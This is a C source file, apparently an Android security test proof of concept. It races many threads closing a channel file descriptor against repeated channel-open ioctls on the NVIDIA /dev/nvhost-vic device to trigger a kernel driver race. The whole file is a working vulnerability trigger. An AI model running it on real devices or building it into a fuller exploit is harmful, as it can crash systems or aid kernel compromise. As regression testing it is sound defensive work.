1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <string.h>
18 #include <stdio.h>
19 #include <stdlib.h>
20 #include <pthread.h>
21 #include <sys/ioctl.h>
22 #include <sys/mman.h>
23 #include <errno.h>
24 #include <sys/stat.h>
25 #include <fcntl.h>
26 #include <sched.h>
27 #include <sys/types.h>
28 #include <signal.h>
29 #include <unistd.h>
30
31 #define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
32 #define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
33 #define CLOSE_THREAD_NUM 100
34 #define TRY_TIMES 900
35
36 #define DEV "/dev/nvhost-vic"
37
38 struct nvhost_channel_open_args {
39 __s32 channel_fd;
40 };
41
42 #define NVHOST_IOCTL_MAGIC 'H'
43 #define NVHOST_IOCTL_CHANNEL_OPEN \
44 _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
45
46 int fd;
47 pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
48 pthread_t toggle_thread_id;
49
set_affinity(int num)50 static int set_affinity(int num)
51 {
52 int ret = 0;
53 cpu_set_t mask;
54 CPU_ZERO(&mask);
55 CPU_SET(num, &mask);
56 ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
57 if(ret == -1){
58 printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
59 }
60 return ret;
61 }
62
prepare()63 static void prepare()
64 {
65 return;
66 }
67
68 volatile int target_fd;
69 volatile int attack;
close_thread(void * no_use)70 void* close_thread(void* no_use)
71 {
72 set_affinity(1);
73
74 while(attack){
75 usleep(200);
76 close(target_fd);
77 }
78
79 return NULL;
80 }
81
main()82 int main()
83 {
84 int i, try_time = TRY_TIMES, ret;
85 struct nvhost_channel_open_args o_args = { 0 };
86
87 /* bind_cpu */
88 set_affinity(0);
89
90 /* open dev */
91 fd = open(DEV,O_RDONLY);
92 if(fd == -1){
93 ERR("[-] open failed");
94 return 0;
95 } else {
96 printf("[+] open OK\n");
97 }
98
99 #if 1
100 ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
101 if(ret == -1) {
102 ERR("[-] ioctl failed");
103 goto out_dev;
104 } else {
105 printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
106 }
107
108 target_fd = o_args.channel_fd;
109 #endif
110
111 /* create close thread */
112 #if 1
113 attack = 1;
114 for(i = 0; i < CLOSE_THREAD_NUM; i++){
115 ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
116 if(ret){
117 goto out_close_thread;
118 }
119 }
120 #endif
121
122 #if 1
123 for(i = 0; i < TRY_TIMES; i++){
124 /* open */
125 ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
126 usleep(200);
127 }
128 #endif
129
130 out_close_thread:
131 attack = 0;
132 /* kill close thread */
133 for(i = 0; i < CLOSE_THREAD_NUM; i++){
134 if(close_thread_id[i])
135 pthread_join(close_thread_id[i], NULL);
136 }
137 out_dev:
138 close(fd);
139 return 0;
140 }
141